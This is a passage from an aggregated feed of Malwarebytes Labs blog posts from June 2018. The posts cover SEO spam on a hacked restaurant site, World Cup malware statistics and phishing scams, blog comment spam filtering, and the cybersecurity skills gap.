  3. Hidden text, where a website is filled with content the same colour as the background and placed across multiple pages in an effort to boost links/ranking for the linked sites in question. This can be content added deliberately by the webmaster, but it can also come about as a result of a hacked website.

A fourth variant of SEO poisoning would be where a hacker added malicious files to a site and drew visitors there through bogus search results, but services such as Google have been cracking down on this for years.

The fallout

While compromises of this kind may give a slight, fleeting edge to the scammers pushing their wares, it can do significant damage to the webmaster’s online business. Everything from page rank to general trustworthiness all take a nose dive in the eyes of Google, and it can be hard to get things back on track.

In this case, the Red Hen site is running on WordPress, so it’s possible an exploit targeting the popular platform or one of its plugins was used. It could even be down to something as basic as gaining access using default admin credentials, or a webmaster being caught up in a phishing scam. We couldn’t say for sure, though attacks on content management systems have been ramping up over the last quarter. Regardless of the break-in method, the site owners definitely have some cleaning up to do.

If you’d like to delve deeper into the art of SEO, we have a couple of links you can browse.

SEO poisoning: is it worth it?

Google’s featured snippets abused by SEO scammers

A guide to website security

Otherwise, pay attention to search results when hunting around online. If you’re expecting to see a result for an eatery located in Lexington but instead find a webpage related to cars and written in Japanese—someone is likely giving Google the slip by abusing its algorithms in order to boost phony results.

Click to enlarge

And if you do find your favorite restaurant is serving up Viagra instead of farm-to-table, you might want to do things the old fashioned way: Grab a leaflet and order takeout.

The post Red Hen website suffers SEO spam compromise appeared first on Malwarebytes Labs.

Categories: Malware Bytes

World Cup 2018: malware attacks gunning for goal

Malware Bytes Security - Wed, 06/27/2018 - 2:29pm

World Cup 2018 is upon us and in full swing, bringing together 32 nations for a month of footballing to see who’ll be crowned World Champion. With the tournament underway, we thought it’d be fun to see which of the footballing powerhouses also expended a similar amount of energy fighting off malware attacks.

From January 1 until June 14, the day the World Cup matches began, we gathered up all of our data on registered threats per country, seeing which “teams” attracted the most attacks, and which slipped under the malware radar. Shall we take a look?

The rules of the game

We generally regard the “winner” of a game as the one who, well, wins. Score the most goals, beat the opponents, and move onto the next stage until victory is yours. That doesn’t quite work when talking about malware attacks on a collection of nations, however. In our wacky realm of World Cup–themed malware antics, the winner is the loser, in a way.

For example, do you think the nation being hammered with the most attacks is feeling like much of a champion?

Perhaps your take is that the true victor is the team who receives the smallest number of attacks. But that doesn’t necessarily mean that the country is doing a bang-up job defending against malware.

Maybe their infrastructure isn’t as interesting to criminals as one belonging to a larger nation. Perhaps they’re missing a number of home-grown hackers who code terrible things in their spare time. Whatever the reason, some other countries just aren’t seeing the same amount of malware as the “winners.”

Whatever your stance, we’ve got you covered with one of those gigantic novelty football tarps.

First half

Russia is the hands-down “winner” in terms of sheer volume of attacks, with a total of 5,942,715 malware threats received since the beginning of the year. With just over 1,500 threats per hour, Russia is most under fire from adware (1,940,814 cases), cryptomining (1,116,872 cases), and Trojans (987,233 cases).

Brazil, with 5,789,375 registered malware threats since the beginning of the year, is close behind Russia in second place. Their goal was most frequently hammered by adware (1,508,125 cases) and cryptomining (948,143).

France exit the stadium with a strong third-place position, feeling the non-stop press of attacks down their left flank. Or right? I don’t know, I play tennis. Regardless of football technique, they weigh in with 3,605,444 registered malware attacks, which is, frankly, a terrifying amount of footballs.

Germany, the 2014 World Cup Champion, is a football powerhouse you may have expected to be equally matched in malware threats. However, just like their mediocre start to World Cup play, they crawl into a “disappointing” sixth place at the half, with 1,987,421 threats counted since the beginning of the year. They complement their ability to knock England out of competitions with penalty kicks from the adware sector (608,816) and Trojans (342,156).

The nations with the fewest registered attacks in 2018 are Iceland (17,946 malware cases), Senegal (26,847), and Nigeria (97,938). The current European (football) Champion, Portugal, falls just outside of the top 10 biggest targets, with a total of 770,827 registered cases.

Among the 32 nations, adware, cryptomining, and Trojans were the dominant threats between January and June, with a significant increase in adware since the beginning of the second quarter.

Second half

What I’m mostly here for, though, is to see how England are faring in the football/malware stakes.

The answer is, of course, middle-of-the-table mediocrity, because the last time we won anything was 1966. Remember though, we’re in the land of the upside down, where being top of this chart, in particular, may not be a good thing.

While England isn’t stealthily evading all cybercriminals like Nigeria or Iceland, we still put in a reasonable performance at 20 out of 33, nestled between Saudi Arabia (430,953 attacks) and Croatia (381,364).

One of the biggest attackers aimed at England’s goal line are the ubiquitous cryptominers, with 214,615 threats registered in total, panning out to about 1,430 attacks a day. Trojans have another strong showing with 42,241 in total—that’s a daily tally of about 280. Finally, we have a rousing performance from adware, who aimed 34,495 total threats at England at a pace of about 229 per day.

I’m guessing we’re still going out about five nil to Brazil, though.

Extra time

But what regular gameplay doesn’t cover are the number of social engineering tactics deployed to countries participating in the World Cup (and others besides). Events garnering global attention also find what they don’t seek—foul play.

There have been some clever football-themed scams over the years, and it’s possible some of these may be brought out to score a last-minute goal for cybercrime. Let’s take a look at some of the scams of World Cups past and how you can defend against them.

Videogame-themed phishing

We observed a number of scams released during the last World Cup, many of which used a gaming theme as they rode on the coattails of the enormously successful FIFA Football titles produced by EA. In 2018, football games are still incredibly popular, and it’s World Cup season once again.

One such gaming scheme used social media accounts offering up football freebies in return for logging into third-party websites. Here’s a fake EA account on Instagram:

Click to enlarge

Here’s the final destination, a phishing page harvesting gaming accounts:

Click to enlarge

A result for phony streaming

Fake football match streams are always popular, and we saw a wave of them at the last World Cup, the majority of which redirected to surveys and other assorted nonsense.

Click to enlarge

A dangerous sliding tackle (into your DMs)

In 2014, we also saw a novel social engineering technique used, where fake support accounts dropped themselves into chats between customers and verified support channels, then directed victims to phishing pages.

Click to enlarge

In this case, it was a phish for the Origin gaming platform:

Click to enlarge

While the above was a fairly generic phish attack, many were specifically pinned around World Cup imagery and gaming, like this one:

Click to enlarge

Phishing mails pipped at the post

Another common tactic come World Cup time: fake “You’re a winner!” emails claiming millions of dollars and free tickets are waiting in the wings. Here’s one example from the last World Cup:

Click to enlarge

Claiming to be the “FIFA Online Promotions Coordinator,” the sender requested the kind of personal information usually grabbed in the early stages of an advance fee fraud scam. This definitely wouldn’t result in free tickets, but it may well have resulted in a hat trick for enterprising scammers nabbing some easy cash.

Defensive strategy

To defend against malware threats and other scams around World Cup time, you should familiarize yourself with some of the common scam tactics being deployed. Dubious emails are already in circulation this year, and there’s still a few weeks left for malware miscreants to ruin your day.

Keep your security software and operating system up-to-date, steer clear of “too good to be true” offers, and you’ll have a safe and incident-free World Cup. While the players might enjoy a well-deserved break after the game has ended, in the realm of malware creation, the attackers are still playing long after the final whistle blows.

The post World Cup 2018: malware attacks gunning for goal appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Did my comment on your blog get lost?

Malware Bytes Security - Mon, 06/25/2018 - 1:00pm

If you ever feel bad about your job because of mindless tasks you must perform day after day, or if you’re bothered by the fact that your chosen work pays crap, produces nothing useful, and helps no one: have a look at blog comment spammers and breathe a sigh of relief. They make almost any job look fantastic by comparison.

Unfortunately, they also spam up the very comment sections where people might go for a little break from work doldrums. When that happens on our site, we must take measures to protect our users. Read on to learn about the types of comment spam you might see, why they are banned, and why a good comment may sometimes take a while to appear on Malwarebytes Labs.

Mindless comment bots

To protect our users against the “produce” of mindless bots, we have had to take counter measures that unfortunately sometimes result in benevolent posts getting blocked. However unfortunate, we prefer this situation to one in which our readers could get infected or scammed after clicking on something that they have found in our blog comments. That would go against everything this blog and company stand for!

Because most of the bad comments are blocked silently, readers will only see a small selection of spam—the tip of the garbage iceberg. If I had to guess, I’d say for every comment we have had to remove manually, a few hundred were blocked by the Disqus filters that we have in place to auto-moderate our comments section.

Our filters

So now you may be reading this because your comment did not show up where you expected to find it. Most comments are approved without being reviewed by a moderator because of our automated filtering. Some comments, however, will be held by our filters to wait for moderation. The reasons why it may be held for moderation are because your comment contains any one of the following:

  • Certain cuss words that are not suitable for all audiences. We know the current filters are strict, but we want discussion on our site to remain civilized and family-friendly.
  • Links and URLs. Any site that looks legitimate can, in fact, be malicious, so we rely on a human review to make sure links and URLs are safe.
  • Email addresses. This is not only to protect other readers, but the commenter as well. If you like your inbox to be filled daily with all kinds of “special offers,” go ahead and post your email address in a comment section that allows it.
  • Users with a low reputation, or in other words, known spammers and abusive users.

Manual moderation

If a comment meets any one of the criteria above, our filters put it in a moderation queue, which must be dealt with by one of our human moderators. Unfortunately, Labs doesn’t have an unlimited amount of comment moderators—there are only a few of us, and we’re mostly focused on gathering intel and writing the posts. Sometimes it takes a while before we find a comment that should have been allowed, and that adds something valuable to the discussion.

Most of the time, commenters figure out what was wrong with their comment and post an altered version without links or “bad language.” However, we hope this blog will now help those who didn’t know how to troubleshoot their own comment.

Favorite subjects

If you decide to post a comment that deal with certain subjects, the chances of your comment getting flooded by mindless bots are high, because even though comment spammers have many favorite subjects, our blog scores high for certain keywords, which bring on the spammer. These subjects are:

  • ATM cards
  • Cryptocurrencies
  • Tech support scammers
  • Hackers (for hire)
  • Bitcoin

The fun part—for us anyway—is that when we warned our readers about a group of scammers that tried to peddle unlimited ATM cards on Facebook, the same scammers started posting comments under that article about why their ATM cards are the best, the cheapest, or the most trustworthy.

In fact, I’m pretty sure this post, with the proper keywords in place, will be a real honeypot for comment spammers in the categories we highlighted. And I’m not afraid that this remark will make a difference one way or the other. If anything, comment spammers have taught us that they either can’t or don’t bother to read our posts.

Are they bots?

It appears that most of our comment spammers are bots. Their behavior says just as much as the (misspelled) words in their comments. Bots can be sussed out by any one of the following behaviors:

  • Their posts are pre-formatted. They’ll cut and paste the same post over and over, even if there are spelling mistakes.
  • They are attracted by certain keywords, even if they are out of context.
  • They come from IPs that post more (spammy) comments that any single human user could ever produce.
  • Their post contains email addresses and usernames that were created by a random name generator.

What are the spammers after?

The main goal of these spammers is to get the attention of the readers, whether that’s by getting users to click on a link to their website or to send an email to their account(s). In rare occasions, links are posted to improve the SEO of the target page.

They will say anything to get their links posted.

How to fight comment spammers

By knowing what they are after, you can work out an effective strategy to fight off comment spammers (if you are dealing with them on your own site). An automated system will take a lot of work out of your hands. Disqus and Akismet are the most popular WordPress comment filters. Both will allow you to review blocked comments and make changes, if you want.

When your comments on our blog don’t go through

The above reasons hopefully explain why we chose a combination of safety measures to protect our users, including blocking all links. In our situation, it’s better to create a little extra work for human moderators than to run the risk of allowing malicious links on our site.

If you feel we blocked your comment in error or need help with any of our products, you may reach out to our support team or post on our forums. If you posted a comment and it’s taking a while to see it on our site, double check that you aren’t violating our comment policy/filters. If you are, feel free to post an amended comment instead—that will likely appear automatically and allow you to participate in active discussions.

The post Did my comment on your blog get lost? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (June 18 – June 24)

Malware Bytes Security - Mon, 06/25/2018 - 12:29pm

Last week, we took a deep dive into SamSam ransomware, looked at ways how to identify and delete malicious emails, recognized that there are now risks affecting job recruitment portals, analyzed a malicious Android app banking on the popularity of Fortnite, and identified causes and solutions for the skills shortage in cybersecurity.

Other news

Stay safe, everyone!

The post A week in security (June 18 – June 24) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

What’s causing the cybersecurity skills gap?

Malware Bytes Security - Thu, 06/21/2018 - 11:00am

The proliferation of next-gen technology into mainstream society has been a boon for consumers, entrepreneurs, and business owners alike. Between the rise of mobile computing, the Internet of Things (IoT), and modern social media, our society is more connected than ever before.

But all of this technology presents some new problems, too. According to recent studies, the number of companies that report problematic shortages in the cybersecurity skills of their staff has increased steadily over the past several years. While approximately 23 percent of companies indicated such an issue in 2014, more than 50 percent face the same challenge today.

Additionally, recent reports show that, not surprisingly, 100 percent of tech companies view cybersecurity and privacy breaches as a risk, with 88 percent concerned about their ability manage their IT infrastructure, and 78 percent worried about how they’ll comply with data privacy regulations.

So what’s the problem with cybersecurity? What’s causing such a lack of know-how on such an important cause? Let’s take a look.

Primary causes

Some of the primary causes of the cybersecurity skills gap include:

1. Failure to collaborate

Cybersecurity is a collaborative responsibility that the whole company needs to get behind. Not only does a CEO or CISO need to maintain a comprehensive and versatile IT staff to take a proactive stance against hackers and cybercriminals, but they also need to open two-way lines of communication to address any problems before they get out of hand.

IT staff and cybersecurity researchers also needs to collaborate—with one another and with other professionals in the industry. Given the rapid evolutionary nature of the Internet and its related systems, it’s impossible for any one person—or even one team—to keep up with the day-to-day changes.

2. Lack of process standardization

Although cybersecurity isn’t a standardized job, the task of securing an online system from potential hackers can be automated. This isn’t to say that a company can get rid of its entire IT staff—in fact, it’s just the opposite. Not only are knowledgeable IT experts needed to usher in this standardization, but they’re needed to enforce it, too.

Cybersecurity standardization is achievable in multiple ways, including:

  • Penetration testing: This lets IT staff members run their proprietary hacks and exploits against a system to ensure it is secure from outside hackers and unknown threats.
  • Incident response: Standardizing an IT team’s incident response protocol makes sure everyone is on the same page and knows how to react if a breach does occur.

It’s a winning situation for everyone involved. Owners and CEOs gain comfort knowing that their investments are protected. IT teams get to use their tools and knowledge. And customers don’t have to worry about their personal information falling into the wrong hands.

3. Not enough training opportunities

There’s also a lack of training opportunities in the industry. Although this is an area that sees continual improvement, especially as more colleges and universities embrace areas of study such as big data, the IoT, and cybersecurity, academia still gets far outpaced by the desire, motivation, and sheer boredom that drive today’s hackers.

Potential solutions

Although it will take a concentrated effort to close the cybersecurity skills gap, society is progressing in the right direction. Companies explore and utilize several potential options, including:

1. Workforce investments

Some companies are increasing their investments in the human workforce to join the fight against cybercrime. According to recent studies, only 32 percent of organizations currently provide adequate training in IT security. The same study reveals that 86 percent of respondents do not spend enough capital on their internal training initiatives.

Other companies are hiring IT staff based on their potential instead of their actual past experience. This is a risky process, as working in cybersecurity requires technical acumen and the ability to adapt in the face of fast-paced changes, but some companies have had great success when hiring outside the box. Mathematicians, accountants, or even artists have been hired and deployed successfully to IT security or research teams. Such diverse expertise helps when examining problems from all possible angles.

Making investments to bring more women into the profession is another viable strategy. According to recent studies, female workers comprise only 11 percent of the entire industry workforce. Organizations such as Women in CyberSecurity and Women in International Security are both helping women gain a better foothold in an industry that is traditionally dominated by men.

2. The millennial generation

Millennials could be one of the best tools for fighting cybercrime. Not only are they already familiar with technology, but many of them are interested in entering and leading a tech-oriented career. According to recent surveys, 68 percent of respondents view themselves as technological innovators while 41 percent are early adopters of modern technology.

This spells good news for employers. Technological innovators are known for their outside-of-the-box thinking and proactive attitude toward next-gen technology. Some might come up with new utilities, tools, and methods to support the fight against cybercrime.

Early adopters are typically ahead of the curve when it comes to using new technology. They help by finding and popularizing new tools, and are often tech savvy enough to stave off potential scams and other social engineering tactics.

Unfortunately, the latest reports indicate that less than 10 percent of millennials are interested in making cybersecurity a long-term career. Other professionals predict that our current generation of IT experts is already starting to hit retirement age—a trend that will only make the skills gap worse within the next few years.

But the lack of millennial interest doesn’t stem from a lack of technical interest. Instead, millennials tend to embrace more “exciting” tech development careers, such as video game development, social media, engineering, and app development, to name a few. By repositioning cybersecurity as “cool,” recruiters and other hiring organizations might draw in a younger workforce ready to fight crime on the Internet.

3. Automating processes

Process automation is gaining a lot of steam in the cybersecurity niche. While it wasn’t long ago when data breaches and other incidents required a customized, manual resolution, the power of today’s machine-learning and AI-powered cybersecurity programs make manual intervention almost obsolete.

But human staff members still need to deploy and/or program these systems and monitor the processes they use. Not only does this give IT staff a position on the front lines in the fight against cybercrime, but it also gives them the opportunity to learn new concepts and technologies before many of their peers.

Minimizing the gap in the future

Companies will reduce much of the skills gaps if they divert more resources to building up cybersecurity research and IT teams, and plan ahead. This isn’t always easy—especially with the rapid and ever-changing nature of the development of IT in the 21st century. But there are some strong trends in place to help, starting with an overall increase in cybersecurity awareness over the latter part of the decade.

Roles such as the security analyst, security manager, and are almost always in demand—and they show no signs of slowing. Filling these roles with skilled, knowledgeable experts might not solve every IT problem—but it’s a good start.

The post What’s causing the cybersecurity skills gap? appeared first on Malwarebytes Labs.

Categories: Malware Bytes